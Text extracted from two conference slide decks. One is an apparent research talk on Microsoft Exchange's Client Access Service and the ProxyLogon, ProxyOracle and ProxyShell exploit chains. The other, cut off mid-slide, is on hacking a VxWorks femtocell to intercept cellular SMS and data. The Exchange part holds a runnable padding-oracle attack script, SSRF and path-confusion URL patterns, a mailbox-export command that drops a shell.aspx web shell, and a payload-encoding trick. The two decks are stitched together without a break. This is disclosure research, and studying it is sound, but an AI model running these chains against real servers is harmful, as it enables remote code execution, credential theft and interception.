Jan 05, 2021 | ProxyLogon               | CVE-2021-27065 | Mar 02, 2021 | Orange Tsai, Volexity and MSTIC
Jan 17, 2021 | ProxyOracle              | CVE-2021-31196 | Jul 13, 2021 | Orange Tsai
Jan 17, 2021 | ProxyOracle              | CVE-2021-31195 | May 11, 2021 | Orange Tsai
Apr 02, 2021 | ProxyShell (Pwn2Own Bug) | CVE-2021-34473 | Apr 13, 2021 | Orange Tsai (Working with ZDI)
Apr 02, 2021 | ProxyShell (Pwn2Own Bug) | CVE-2021-34523 | Apr 13, 2021 | Orange Tsai (Working with ZDI)
Apr 02, 2021 | ProxyShell (Pwn2Own Bug) | CVE-2021-31207 | May 11, 2021 | Orange Tsai (Working with ZDI)
Jun 02, 2021 | -                        | -              | -            | Orange Tsai
Vulnerabilities Related to This Attack Surface
■ Vulnerability related to this new attack surface

Dubbed to | CVE            | Patch Time   | Reported by
HAFNIUM   | CVE-2021-26855 | Mar 02, 2021 | Orange Tsai, Volexity and MSTIC
HAFNIUM   | CVE-2021-27065 | Mar 02, 2021 | Orange Tsai, Volexity and MSTIC
HAFNIUM   | CVE-2021-26857 | Mar 02, 2021 | Dubex and MSTIC
HAFNIUM   | CVE-2021-26858 | Mar 02, 2021 | MSTIC
-         | CVE-2021-28480 | Apr 13, 2021 | NSA
-         | CVE-2021-28481 | Apr 13, 2021 | NSA
-         | CVE-2021-28482 | Apr 13, 2021 | NSA
-         | CVE-2021-28483 | Apr 13, 2021 | NSA
Exchange Architecture
Backend Server
Frontend Server
2000/2003
Mailbox Role
Client Access Role
Hub Transport
Role
Unified Messaging
Role
Edge Transport
Role
2007/2010
Mailbox Role
Client Access Role
Edge Transport
Role
2013
Edge Transport
Role
2016/2019
Mailbox Role
Mailbox Service
Client Access
Service
Where to Focus?
• We focus on the Client Access Service (CAS)
• CAS is a fundamental protocol handler in Microsoft Exchange Server.
The Microsoft official documentation also indicates:
"Mailbox servers contain the Client Access Services that accept client
connections for all protocols. These frontend services are responsible for
routing or proxying connections to the corresponding backend services"
where we focus on
Client Access Service in IIS
Two websites?
Client Access Service in IIS
Exchange Architecture
• Applications in Frontend include the ProxyModule
• Parse incoming HTTP requests, apply protocol specified settings, and
forward to the Backend
• Applications in Backend include the BackendRehydrationModule
• Receive and populate HTTP requests from the Frontend
• Applications synchronizes the internal information between the
Frontend and Backend by HTTP headers
IIS
IIS
Remote
PowerShell
RPC
Proxy
EWS, OWA
ECP, OAB…
Mailbox Database
FrontEnd Service
BackEnd Service
HTTP/HTTPS
IIS Modules
Validation
Module
Logging
Module
IIS Modules
Filter
Module
FBA
Module
Oauth
Module
…
Rehydration
Module
RoutingUpdate
Module
RBAC
Module
HTTP Proxy Module
Our Ideas
Could we access the Backend intentionally?
\ProxyRequestHandler.cs
BeginRequest
AuthenticateRequest
AuthorizeRequest
MapRequestHandler
EndRequest
IHttpHandler
LogRequest
1.
Request Section
> CopyHeadersToServerRequest
> CopyCookiesToServerRequest
> AddProtocolSpecificHeadersToServerRequest
2.
Proxy Section
> GetTargetBackEndServerUrl
> CreateServerRequest
> GetServerResponse
3.
Response Section
> CopyHeadersToClientResponse
> CopyCookiesToClientResponse
Copy Client Headers
1.
Request Section
> CopyHeadersToServerRequest
> CopyCookiesToServerRequest
> AddProtocolSpecificHeadersToServerRequest
2.
Proxy Section
> GetTargetBackEndServerUrl
> CreateServerRequest
> GetServerResponse
3.
Response Section
> CopyHeadersToClientResponse
> CopyCookiesToClientResponse
BeginRequest
AuthenticateRequest
AuthorizeRequest
MapRequestHandler
EndRequest
IHttpHandler
LogRequest
HTTP Header Blacklists
protected virtual bool ShouldCopyHeaderToServerRequest(string headerName) {
return !string.Equals(headerName, "X-CommonAccessToken", OrdinalIgnoreCase)
&& !string.Equals(headerName, "X-IsFromCafe", OrdinalIgnoreCase)
&& !string.Equals(headerName, "X-SourceCafeServer", OrdinalIgnoreCase)
&& !string.Equals(headerName, "msExchProxyUri", OrdinalIgnoreCase)
&& !string.Equals(headerName, "X-MSExchangeActivityCtx", OrdinalIgnoreCase)
&& !string.Equals(headerName, "return-client-request-id", OrdinalIgnoreCase)
&& !string.Equals(headerName, "X-Forwarded-For", OrdinalIgnoreCase)
&& (!headerName.StartsWith("X-Backend-Diag-", OrdinalIgnoreCase)
|| this.ClientRequest.GetHttpRequestBase().IsProbeRequest());
}
HttpProxy\ProxyRequestHandler.cs
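As a rough illustration, the blacklist check can be mirrored in a few lines of Python. The header names come from the C# snippet above; the function itself is a stand-in, not Exchange's actual implementation, and the probe-request exception for X-Backend-Diag-* is ignored in this sketch:

```python
# Stand-in re-implementation of ShouldCopyHeaderToServerRequest():
# the Frontend refuses to forward these security-sensitive headers,
# so a client cannot smuggle them to the Backend directly.
BLOCKED = {
    "x-commonaccesstoken", "x-isfromcafe", "x-sourcecafeserver",
    "msexchproxyuri", "x-msexchangeactivityctx",
    "return-client-request-id", "x-forwarded-for",
}

def should_copy_header(name: str) -> bool:
    n = name.lower()
    # X-Backend-Diag-* is also dropped (probe-request exception omitted)
    return n not in BLOCKED and not n.startswith("x-backend-diag-")

print(should_copy_header("X-CommonAccessToken"))  # False
print(should_copy_header("Cookie"))               # True
```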
Copy Client Cookies
1.
Request Section
> CopyHeadersToServerRequest
> CopyCookiesToServerRequest
> AddProtocolSpecificHeadersToServerRequest
2.
Proxy Section
> GetTargetBackEndServerUrl
> CreateServerRequest
> GetServerResponse
3.
Response Section
> CopyHeadersToClientResponse
> CopyCookiesToClientResponse
BeginRequest
AuthenticateRequest
AuthorizeRequest
MapRequestHandler
EndRequest
IHttpHandler
LogRequest
Add Special Headers
1.
Request Section
> CopyHeadersToServerRequest
> CopyCookiesToServerRequest
> AddProtocolSpecificHeadersToServerRequest
2.
Proxy Section
> GetTargetBackEndServerUrl
> CreateServerRequest
> GetServerResponse
3.
Response Section
> CopyHeadersToClientResponse
> CopyCookiesToClientResponse
BeginRequest
AuthenticateRequest
AuthorizeRequest
MapRequestHandler
EndRequest
IHttpHandler
LogRequest
Clone User Identity
if (this.ClientRequest.IsAuthenticated) {
CommonAccessToken commonAccessToken = AspNetHelper.FixupCommonAccessToken(
this.HttpContext, this.AnchoredRoutingTarget.BackEndServer.Version);
if (commonAccessToken != null) {
headers["X-CommonAccessToken"] = commonAccessToken.Serialize(
new int?(HttpProxySettings.CompressTokenMinimumSize.Value));
}
} else if (this.ShouldBackendRequestBeAnonymous()) {
headers["X-CommonAccessToken"] = new CommonAccessToken(9).Serialize();
}
HttpProxy\ProxyRequestHandler.cs
Calculate Backend URL
1.
Request Section
> CopyHeadersToServerRequest
> CopyCookiesToServerRequest
> AddProtocolSpecificHeadersToServerRequest
2.
Proxy Section
> GetTargetBackEndServerUrl
> CreateServerRequest
> GetServerResponse
3.
Response Section
> CopyHeadersToClientResponse
> CopyCookiesToClientResponse
BeginRequest
AuthenticateRequest
AuthorizeRequest
MapRequestHandler
EndRequest
IHttpHandler
LogRequest
Create New HTTP Client
1.
Request Section
> CopyHeadersToServerRequest
> CopyCookiesToServerRequest
> AddProtocolSpecificHeadersToServerRequest
2.
Proxy Section
> GetTargetBackEndServerUrl
> CreateServerRequest
> GetServerResponse
3.
Response Section
> CopyHeadersToClientResponse
> CopyCookiesToClientResponse
BeginRequest
AuthenticateRequest
AuthorizeRequest
MapRequestHandler
EndRequest
IHttpHandler
LogRequest
Attach Authorization Header
if (this.ProxyKerberosAuthentication) {
// use origin Kerberos Authentication
} else if (this.AuthBehavior.AuthState == AuthState.BackEndFullAuth || this.
ShouldBackendRequestBeAnonymous() || (HttpProxySettings.TestBackEndSupportEnabled.Value
&& !string.IsNullOrEmpty(this.ClientRequest.Headers["TestBackEndUrl"]))) {
// unauthenticated
} else {
serverRequest.Headers["Authorization"] = KerberosUtilities.GenerateKerberosAuthHeader(
serverRequest.Address.Host, this.TraceContext,
ref this.authenticationContext, ref this.kerberosChallenge);
}
HttpProxy\ProxyRequestHandler.cs
Generate Kerberos Ticket
internal static string GenerateKerberosAuthHeader(string host, int traceContext, ref
AuthenticationContext authenticationContext, ref string kerberosChallenge) {
// …
authenticationContext = new AuthenticationContext();
authenticationContext.InitializeForOutboundNegotiate(AuthenticationMechanism.Kerberos,
"HTTP/" + host, null, null);
SecurityStatus securityStatus = authenticationContext.NegotiateSecurityContext(inputBuffer,
out bytes);
return "Negotiate " + Encoding.ASCII.GetString(bytes);
}
HttpProxy\KerberosUtilities.cs
The Actual Request Sent to
Backend
Get Backend Response
1.
Request Section
> CopyHeadersToServerRequest
> CopyCookiesToServerRequest
> AddProtocolSpecificHeadersToServerRequest
2.
Proxy Section
> GetTargetBackEndServerUrl
> CreateServerRequest
> GetServerResponse
3.
Response Section
> CopyHeadersToClientResponse
> CopyCookiesToClientResponse
BeginRequest
AuthenticateRequest
AuthorizeRequest
MapRequestHandler
EndRequest
IHttpHandler
LogRequest
Copy Response to Client
1.
Request Section
> CopyHeadersToServerRequest
> CopyCookiesToServerRequest
> AddProtocolSpecificHeadersToServerRequest
2.
Proxy Section
> GetTargetBackEndServerUrl
> CreateServerRequest
> GetServerResponse
3.
Response Section
> CopyHeadersToClientResponse
> CopyCookiesToClientResponse
BeginRequest
AuthenticateRequest
AuthorizeRequest
MapRequestHandler
EndRequest
IHttpHandler
LogRequest
Backend Rehydration Module
• IIS has implicitly done the Authentication and set
the User.Identity to current HttpContext object
private void OnAuthenticateRequest(object source,
EventArgs args) {
if (httpContext.Request.IsAuthenticated) {
this.ProcessRequest(httpContext);
}
}
private void ProcessRequest(HttpContext httpContext) {
CommonAccessToken token;
if (this.TryGetCommonAccessToken(httpContext, out token))
// …
}
\BackendRehydrationModule.cs
BeginRequest
AuthenticateRequest
AuthorizeRequest
MapRequestHandler
EndRequest
IHttpHandler
LogRequest
1
Restore Frontend User Identity
2
private bool TryGetCommonAccessToken(HttpContext httpContext, out
CommonAccessToken token) {
string text = httpContext.Request.Headers["X-CommonAccessToken"];
flag = this.IsTokenSerializationAllowed(httpContext.User.Identity
as WindowsIdentity);
if (!flag)
throw new BackendRehydrationException(…)
token = CommonAccessToken.Deserialize(text);
httpContext.Items["Item-CommonAccessToken"] = token;
Security\Authentication\BackendRehydrationModule.cs
1
Is Token Serialization Allowed?
2
private bool TryGetCommonAccessToken(HttpContext httpContext, out
CommonAccessToken token) {
string text = httpContext.Request.Headers["X-CommonAccessToken"];
flag = this.IsTokenSerializationAllowed(httpContext.User.Identity
as WindowsIdentity);
if (!flag)
throw new BackendRehydrationException(…)
token = CommonAccessToken.Deserialize(text);
httpContext.Items["Item-CommonAccessToken"] = token;
Security\Authentication\BackendRehydrationModule.cs
Check AD Extended Rights
private bool IsTokenSerializationAllowed(WindowsIdentity windowsIdentity) {
flag2 = LocalServer.AllowsTokenSerializationBy(clientSecurityContext);
return flag2;
}
private static bool AllowsTokenSerializationBy(ClientSecurityContext clientContext) {
return LocalServer.HasExtendedRightOnServer(clientContext,
WellKnownGuid.TokenSerializationRightGuid); // ms-Exch-EPI-Token-Serialization
}
Security\Authentication\BackendRehydrationModule.cs
Auth-Flow in Summary
1.
Frontend IIS authenticates the request (Windows or Basic authentication) and serializes the
current Identity to X-CommonAccessToken HTTP header
2.
Frontend generates a Kerberos ticket by its HTTP SPN to Authorization HTTP header
3.
Frontend proxies the HTTP request to Backend
4.
Backend IIS authenticates the request and checks that the authenticated user has the TokenSerialization right
5.
Backend rehydrates the user from X-CommonAccessToken HTTP header
HTTP/HTTPS
CAS Backend
Module
F
Rehydration
Module
Module
D
Module
E
CAS Frontend
HttpProxy
Module
Module A
Module B
Module C
HTTP/HTTPS
Let's Hack the Planet
ProxyLogon
• The most well-known Exchange Server vulnerability in the world😩
• An unauthenticated attacker can execute arbitrary code on Microsoft Exchange
Server through a single exposed 443 port!
• ProxyLogon is chained with 2 bugs:
• CVE-2021-26855 - Pre-auth SSRF leads to Authentication Bypass
• CVE-2021-27065 - Post-auth Arbitrary-File-Write leads to RCE
Where ProxyLogon Begin?
1.
Request Section
> CopyHeadersToServerRequest
> CopyCookiesToServerRequest
> AddProtocolSpecificHeadersToServerRequest
2.
Proxy Section
> GetTargetBackEndServerUrl
> CreateServerRequest
> GetServerResponse
3.
Response Section
> CopyHeadersToClientResponse
> CopyCookiesToClientResponse
BeginRequest
AuthenticateRequest
AuthorizeRequest
MapRequestHandler
EndRequest
IHttpHandler
LogRequest
Arbitrary Backend Assignment
1
2
protected override AnchorMailbox ResolveAnchorMailbox() {
HttpCookie httpCookie = base.ClientRequest.Cookies["X-AnonResource-Backend"];
if (httpCookie != null) {
this.savedBackendServer = httpCookie.Value;
}
return new ServerInfoAnchorMailbox(
BackEndServer.FromString(this.savedBackendServer), this);
}
HttpProxy\OwaResourceProxyRequestHandler.cs
https://[foo]@example.com:443/path#]:444/owa/auth/x.js
Super SSRF
• What's the root cause about this arbitrary backend assignment?
• Exchange has to maintain compatibility between the new and old architectures,
hence it introduced the X-AnonResource-Backend cookie
• A Super SSRF
• Control almost all the HTTP request and get all the response
• Automatically attaches a Kerberos ticket with Exchange$ machine-account privilege
• Leverage the backend internal API /ecp/proxylogon.ecp to obtain a valid Control
Panel session and a file-write bug to get RCE
Demo
https://youtu.be/SvjGMo9aMwE
ProxyOracle
• An interesting Exchange Server exploit with different approach
• An unauthenticated attacker can recover the victim's username and password
in plaintext simply by tricking the victim into opening a malicious link
• ProxyOracle is chained with 2 bugs:
• CVE-2021-31195 - Reflected Cross-Site Scripting
• CVE-2021-31196 - Padding Oracle Attack on Exchange Cookies Parsing
How Users Log-in OWA/ECP?
Form-Based Authentication
IIS
IIS
Remote
PowerShell
RPC
Proxy
EWS/OWA
ECP/OAB…
Mailbox Database
HTTP/HTTPS
IIS Modules
Validation
Logging
IIS Modules
Filter
FBA
Oauth
…
Rehydration
Routing
Update
RBAC
HTTP Proxy Module
What FBA Cookies Look Like
cadataTTL
cadataKey
cadata
cadataIV
cadataSig
FbaModule Encryption Logic
@key = GetServerSSLCert().GetPrivateKey()
cadataSig = RSA(@key).Encrypt("Fba Rocks!")
cadataIV
= RSA(@key).Encrypt(GetRandomBytes(16))
cadataKey = RSA(@key).Encrypt(GetRandomBytes(16))
@timestamp = GetCurrentTimestamp()
cadataTTL
= AES_CBC(cadataKey, cadataIV).Encrypt(@timestamp)
@blob = "Basic " + ToBase64String(UserName + ":" + Password)
cadata = AES_CBC(cadataKey, cadataIV).Encrypt(@blob)
PSEUDO CODE
FbaModule Encryption Logic
private void ParseCadataCookies(HttpApplication httpApplication) {
using (ICryptoTransform transform = aesCryptoServiceProvider.CreateDecryptor()) {
try {
byte[] array5 = Convert.FromBase64String(request.Cookies["cadata"].Value);
bytes2 = transform.TransformFinalBlock(array5, 0, array5.Length);
} catch (CryptographicException arg8) {
return;
}
}
}
HttpProxy\FbaModule.cs
The Oracle
protected enum LogonReason {
None,
Logoff,
InvalidCredentials,
Timeout,
ChangePasswordLogoff
}
\FbaModule.cs
AES Decrypt
  Padding Error → /logon.aspx?reason=0
  Padding Good  → Continue Login
      Login Failure → /logon.aspx?reason=2
      Login Success
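Distinguishable reason codes give a classic CBC padding oracle. Below is a self-contained sketch of the attack logic: a toy 16-byte permutation stands in for AES, and a local oracle() function stands in for the /logon.aspx redirect, so none of this is Exchange code — it only demonstrates the byte-at-a-time recovery.

```python
import os

BS = 16
KEY = os.urandom(BS)

# Toy 16-byte block permutation standing in for AES -- the attack only
# relies on the CBC structure, not on the underlying cipher.
def E(b): return bytes(reversed([x ^ k for x, k in zip(b, KEY)]))
def D(b): return bytes(x ^ k for x, k in zip(reversed(b), KEY))

def pkcs7_pad(b):
    n = BS - len(b) % BS
    return b + bytes([n]) * n

def pkcs7_unpad(b):
    n = b[-1]
    if not 1 <= n <= BS or b[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return b[:-n]

def cbc_encrypt(iv, pt):
    out, prev = b"", iv
    for i in range(0, len(pt), BS):
        prev = E(bytes(x ^ y for x, y in zip(pt[i:i + BS], prev)))
        out += prev
    return out

def oracle(iv, ct):
    """Stand-in for /logon.aspx: True = padding valid (reason=2 on a
    real server), False = padding error (reason=0)."""
    pt, prev = b"", iv
    for i in range(0, len(ct), BS):
        pt += bytes(x ^ y for x, y in zip(D(ct[i:i + BS]), prev))
        prev = ct[i:i + BS]
    try:
        pkcs7_unpad(pt)
        return True
    except ValueError:
        return False

def attack_block(prev, block):
    """Recover one plaintext block using only the oracle."""
    inter = bytearray(BS)                      # intermediate state D(block)
    for pad_val in range(1, BS + 1):
        pos = BS - pad_val
        for guess in range(256):
            forged = bytearray(BS)
            for i in range(pos + 1, BS):
                forged[i] = inter[i] ^ pad_val
            forged[pos] = guess
            if oracle(bytes(forged), block):
                if pad_val == 1:               # rule out accidental \x02\x02
                    forged[pos - 1] ^= 0xFF
                    if not oracle(bytes(forged), block):
                        continue
                inter[pos] = guess ^ pad_val
                break
    return bytes(x ^ y for x, y in zip(inter, prev))

iv = os.urandom(BS)
ct = cbc_encrypt(iv, pkcs7_pad(b"Basic dXNlcjpwYXNz"))   # "user:pass"
full = iv + ct
recovered = b"".join(attack_block(full[i:i + BS], full[i + BS:i + 2 * BS])
                     for i in range(0, len(ct), BS))
print(pkcs7_unpad(recovered))                  # b'Basic dXNlcjpwYXNz'
```

Against a real target the two oracle calls per guess would be two requests whose reason query string is inspected.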
We can decrypt the cookies now
But… How to get the client cookies?
We discover a new XSS to chain together
However, all sensitive cookies are protected by HttpOnly😥
Take Over Client Requests
(Attacker ↔ Victim ↔ Exchange)
1. Attacker sends a malicious mail to the victim
2. Victim opens the mail and is redirected to the XSS page; the XSS triggers and sets the SSRF cookie
3. Victim visits page /foo.gif; Exchange proxies /foo.gif
4. Exchange sends the response
Demo
https://youtu.be/VuJvmJZxogc
ProxyShell
• The exploit chain we demonstrated at Pwn2Own 2021
• An unauthenticated attacker can execute arbitrary commands on Microsoft
Exchange Server through a single exposed 443 port!
• ProxyShell is chained with 3 bugs:
• CVE-2021-34473 - Pre-auth Path Confusion leads to ACL Bypass
• CVE-2021-34523 - Elevation of Privilege on Exchange PowerShell Backend
• CVE-2021-31207
- Post-auth Arbitrary-File-Write leads to RCE
Where ProxyShell Begin?
1.
Request Section
> CopyHeadersToServerRequest
> CopyCookiesToServerRequest
> AddProtocolSpecificHeadersToServerRequest
2.
Proxy Section
> GetTargetBackEndServerUrl
> CreateServerRequest
> GetServerResponse
3.
Response Section
> CopyHeadersToClientResponse
> CopyCookiesToClientResponse
BeginRequest
AuthenticateRequest
AuthorizeRequest
MapRequestHandler
EndRequest
IHttpHandler
LogRequest
ProxyShell
• ProxyShell started with a Path Confusion bug on Exchange Server
Explicit Logon feature
• The feature is designed to enable users to open another mailbox/calendar and
display it in a new browser window
• The Exchange parsed the mailbox address and normalized the URL internally
https://exchange/OWA/[email protected]/Default.aspx
2
Extract Mailbox Address from URL
1
protected override AnchorMailbox ResolveAnchorMailbox() {
if (RequestPathParser.IsAutodiscoverV2PreviewRequest(base.ClientRequest.Url.AbsolutePath))
text = base.ClientRequest.Params["Email"];
// …
this.isExplicitLogonRequest = true;
this.explicitLogonAddress = text;
}
public static bool IsAutodiscoverV2PreviewRequest(string path) {
return path.EndsWith("/autodiscover.json", StringComparison.OrdinalIgnoreCase);
}
HttpProxy\EwsAutodiscoverProxyRequestHandler.cs
The Fatal Erase
protected override UriBuilder GetClientUrlForProxy() {
string absoluteUri = base.ClientRequest.Url.AbsoluteUri;
uri = UrlHelper.RemoveExplicitLogonFromUrlAbsoluteUri(absoluteUri,
this.explicitLogonAddress);
return new UriBuilder(uri);
}
public static string RemoveExplicitLogonFromUrlAbsoluteUri(string absoluteUri, string
explicitLogonAddress) {
string text = "/" + explicitLogonAddress;
int num = absoluteUri.IndexOf(text);
if (num != -1)
return absoluteUri.Substring(0, num) + absoluteUri.Substring(num + text.Length);
}
HttpProxy\EwsAutodiscoverProxyRequestHandler.cs
1
2
The actual part to be removed
Explicit Logon pattern
https://exchange/autodiscover/[email protected]/?&
Email=autodiscover/autodiscover.json%[email protected]
https://exchange:444/?&
Email=autodiscover/autodiscover.json%[email protected]
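A quick Python sketch of the erase step, mirroring RemoveExplicitLogonFromUrlAbsoluteUri(). The :444 in the final URL above comes from the later Frontend-to-Backend rewrite, which this sketch does not model:

```python
# Re-implementation sketch of the CVE-2021-34473 path confusion:
# Exchange strips "/<explicit logon address>" from the URL before proxying.
def remove_explicit_logon(absolute_uri: str, explicit_logon_address: str) -> str:
    text = "/" + explicit_logon_address
    num = absolute_uri.find(text)
    if num != -1:
        return absolute_uri[:num] + absolute_uri[num + len(text):]
    return absolute_uri

url = ("https://exchange/autodiscover/[email protected]"
       "/?&Email=autodiscover/autodiscover.json%[email protected]")
# Request.Params["Email"], URL-decoded by ASP.NET:
addr = "autodiscover/[email protected]"
print(remove_explicit_logon(url, addr))
# https://exchange/?&Email=autodiscover/autodiscover.json%[email protected]
```

The whole ACL-checked /autodiscover prefix vanishes, so the Backend sees an attacker-chosen path.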
Arbitrary Backend Access Again!
Exchange PowerShell Remoting
• The Exchange PowerShell Remoting is a command-line interface that
enables the automation of Exchange tasks
• The Exchange PowerShell Remoting is built upon the PowerShell API and uses
Runspaces for isolation. All operations are based on the WinRM protocol
• Interacting with the PowerShell Backend fails because there is no mailbox for the
SYSTEM user
• We found a piece of code extract Access-Token from URL
Extract Access Token from URL
2
1
private void OnAuthenticateRequest(object source, EventArgs args) {
HttpContext httpContext = HttpContext.Current;
if (httpContext.Request.IsAuthenticated) {
if (string.IsNullOrEmpty(httpContext.Request.Headers["X-CommonAccessToken"])) {
Uri url = httpContext.Request.Url;
Exception ex = null;
CommonAccessToken commonAccessToken = CommonAccessTokenFromUrl(httpContext.
User.Identity.ToString(), url, out ex);
}
}
}
\Configuration\RemotePowershellBackendCmdletProxyModule.cs
Extract Access Token from URL
private CommonAccessToken CommonAccessTokenFromUrl(string user, Uri requestURI,
out Exception ex) {
CommonAccessToken result = null;
string text = LiveIdBasicAuthModule.GetNameValueCollectionFromUri(
requestURI).Get("X-Rps-CAT");
result = CommonAccessToken.Deserialize(Uri.UnescapeDataString(text));
return result;
}
\RemotePowershellBackendCmdletProxyModule.cs
Privilege Downgrade
• An Elevation of Privilege (EOP) because we can access Exchange
PowerShell Backend directly
• The intention of this operation is to be a quick proxy for Internal Exchange
PowerShell communications
• Specify the Access-Token in X-Rps-CAT to impersonate any user
• We use this Privilege Escalation to "downgrade" ourselves from SYSTEM to Exchange
Admin
Execute Arbitrary Exchange PowerShell as Admin
And then?
Attack Exchange PowerShell
• The last piece of the puzzle is to find a post-auth RCE to chain together
• Since we are Exchange admin now, it's easy to abuse the Exchange PowerShell
command New-MailboxExportRequest to export a user's mailbox to a UNC path
New-MailboxExportRequest –Mailbox [email protected]
–FilePath \\127.0.0.1\C$\path\to\shell.aspx
Payload Delivery
• How to embed the malicious payload into the exported file?
• We deliver the malicious payloads by Emails (SMTP) but the file is encoded😢
• The exported file is in Outlook Personal Folders (PST) format; by reading the
MS-PST documentation, we learned it's just a simple permutation encoding
mpbbCrypt = [65, 54, 19, 98, 168, 33, 110, 187, 244, 22, 204, 4, 127, 100, 232, …]
encode_table = bytes.maketrans(bytes(mpbbCrypt), bytes(range(256)))
b'<%@ Page Language="Jscript"%>…'.translate(encode_table)
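A runnable round-trip sketch of the permutative encoding. The real 256-byte mpbbCrypt table is defined in the MS-PST specification and elided above, so a randomly generated permutation stands in for it here:

```python
# Minimal sketch of MS-PST "Permutative Encoding": a fixed 256-byte
# substitution applied byte-by-byte. A seeded random permutation is a
# stand-in for the spec's mpbbCrypt table.
import random

rng = random.Random(0)
mpbb_crypt = list(range(256))
rng.shuffle(mpbb_crypt)                     # stand-in for the spec table

decode_table = bytes.maketrans(bytes(range(256)), bytes(mpbb_crypt))
encode_table = bytes.maketrans(bytes(mpbb_crypt), bytes(range(256)))

payload = b'<%@ Page Language="Jscript"%>'
encoded = payload.translate(encode_table)   # what gets mailed in
decoded = encoded.translate(decode_table)   # what the PST export yields
print(decoded == payload)                   # True
```

Pre-encoding the WebShell with the inverse table means the export writes the plaintext ASPX to disk.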
Put it All Together
1.
Deliver our encoded WebShell payload by SMTP
2. Launch the native PowerShell and intercept the WinRM protocol
• Rewrite the /PowerShell/ to /Autodiscover/ to trigger the Path Confusion bug
• Add query string X-Rps-CAT with corresponding Exchange Admin Access Token
3. Execute commands inside the established PowerShell session
• New-ManagementRoleAssignment to grant ourself Mailbox Import Export Role
• New-MailboxExportRequest to write ASPX file into the local UNC path
4. Enjoy the shell
Demo
https://youtu.be/FC6iHw258RI
Mitigations
1.
Keep Exchange Server up-to-date and avoid exposing it directly to the
Internet (especially the web part)
2.
Microsoft has enhanced the CAS Frontend in April 2021
• The enhancement mitigated the authentication part of this attack surface and
reduced the "pre-auth" effectively
3. Move to Office 365 Exchange Online😏(Just kidding)
Conclusion
• Modern problems require modern solutions
• Try to comprehend the architectures from a higher point of view
• The Exchange CAS is still a good attack surface
• Due to the lack of "pre-auth" bugs, the result may not be as powerful as before
• Exchange is still a buried treasure and waiting for you to hunt bugs
• Fun fact - even you found a super critical bug like ProxyLogon, Microsoft will not
reward you any bounty because Exchange Server On-Prem is out of scope
orange_8361
[email protected]
Thanks!
https://blog.orange.tw | pdf |
Build a free cellular traffic capture tool
with a VxWorks-based femtocell
Hacking Femtocell
Yuwei Zheng @DEF CON 23
Haoqi Shan @DEF CON 23
From: 360 Unicorn Team
Main contents
• About us
• Why do we need it
• How to get a free Femtocell
• Deeply Hack
• Capture packets
• Summary and Reference
About us
• 360 Unicorn Team
• Radio & Hardware Security Research
• Consists of a group of brilliant security researchers
• Focus on the security of anything that uses radio
technologies
• RFID, NFC, WSN
• GPS, UAV, Smart Cars, Telecom, SATCOM
• Our primary mission
• Guarantee that Qihoo360 is not vulnerable to any wireless attack
• Qihoo360 protects its users and we protect Qihoo360
• One of the Defcon 23 vendors
• https://www.defcon.org/html/defcon-23/dc-23-vendors.html
About me
• Yuwei Zheng
• a senior security researcher concentrated in embedded systems
• reversed blackberry BBM, PIN, BIS push mail protocol
• decrypted the RIM network stream successfully in 2011
• finished a MITM attack for blackberry BES
• Haoqi Shan
• a wireless/radio security researcher in Unicorn Team
• obtained bachelor degree of electronic engineering in 2015
• focuses on Wi-Fi penetration, GSM system, router/switcher
hacking
Why do we need it
• Research on products integrated cellular modem
• Capture and hijack
• SMS
• Voice
• Data traffic
Why not software-based GSM base station
• OpenBTS
• USRP
• GNU Radio
• Why not?
• Data traffic hijack
• Access denied to operator core network
• NO real uplink & downlink SMS hijack
Femtocell’s advantages
• Access to network operator
• What a hacked Femtocell can do
• SMS and Data traffic
• Capture
• Hijack
• Modify
• Even more…
• Roaming in operator’s network
Use Femtocell in research
• Cellular modem integrated devices
• Capture or modify control order
• SMS
• 2G
• Capture or modify circle data
• SMS
• 2G
• Trusted data link?
• Find your system vulnerability
How to get a free Femtocell
• Can’t be bought?
• Social engineering
• Complains to Customer Service
• Bad network signal
• Again and again
• Make a complaint to management
• Finally
“Sir, we will set up a femtocell in your home, I hope
this device can make your network signal better. ”
Let’s hack it
• Inside the femtocell
• Home NodeB
• Router with Wi-Fi
• 1 Wan port
• 2 Lan port
• Router configuration page IP
• 192.168.197.1
• Home NodeB configuration page IP
• 192.168.197.241
Quick and simple port scan
• nmap –sT –sU 192.168.197.241
Try to log in
• Try telnet/ftp/http/tftp
• Seems like VxWorks OS
• Wrong password again and again?
• Longer and longer delay before the prompt shows up
• Forget about brute force
Err… it’s VxWorks…
• VxWorks
• a real-time operating system developed as proprietary software
• designed for use in embedded systems requiring real-time
• safety and security certification
• for industries, such as aerospace and defense
• medical devices, industrial equipment
• Notable uses
• The Mars Reconnaissance Orbiter
• Northrop Grumman X-47B Unmanned Combat Air System
• Apple Airport Extreme
• Proprietary software
• Well, seems much harder to be hacked than Linux-based
Femtocell
13
wdbprc(dump memory)
Hacking Femtocell
• VxWorks system debug interface
• Exploit in metasploit by H.D.Moore
• Failed in use
14
wdbprc(scan version)
Hacking Femtocell
• Scanner in metasploit by H.D.Moore
• Repaired
15
Dismantling the hardware
Hacking Femtocell
• Home NodeB
• OMAPL138E
• DSP
• ARM9
• FPGA
• Router
• AR9341
• Router
• Wi-Fi AP
16
Find the UART interface
Hacking Femtocell
• Hmmm… easy!
17
Use the gift
Hacking Femtocell
• Interrupt the boot process
• Get more useful information
18
Play with bootshell
Hacking Femtocell
19
Bootparm
Hacking Femtocell
• Use `p’ to show bootparm
20
What’s inside
Hacking Femtocell
21
What’s inside
Hacking Femtocell
• tffs0
• Directory Structure
• common
• configuration file
• user1
• running version VxWorks system and apps
• user2
• last version VxWorks system and apps
• wlanBackup
• router firmware backup files
22
Download the firmware
Hacking Femtocell
• use tftp port
• Where is it?
• `cp’
• `tftp get’
• One by one
23
Analyze the firmware
Hacking Femtocell
• use `cp’ command
• cp /tffs0/user1/mpcs.Z host:/ftpforvx/user1/mpcs.Z
• cp /tffs0/blabla host:/blabla
• load kernel by command `l’
24
• mpcs.Z base address 0xc010000
Deflate the kernel image
Hacking Femtocell
• mpcs.Z
• “Understanding the bootrom image”
• vxWorks compressed by deflate?
• WindRiver deflate header
• Head magic 05 15 01 00, 4 bytes
• Length , 4 bytes
• Flag 08, 1bytes
• Skip the first 9 bytes, zlib-flate it!
25
Deflate the kernel image
Hacking Femtocell
• dd if=./mpcs.Z of=./mpcs.deflate ibs=1 obs=1 skip=9
• zlib-flate -uncompress < mpcs.deflate > mpcs.out
• strings mpcs.out | grep –i “copyright”
• Success!
26
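The dd + zlib-flate pipeline above can also be done in one small script (a sketch based on the header layout described on the previous slide; the 05 15 01 00 magic and the 9-byte skip come from the slides, the rest is generic zlib — the length-field endianness is an assumption and is not checked here):

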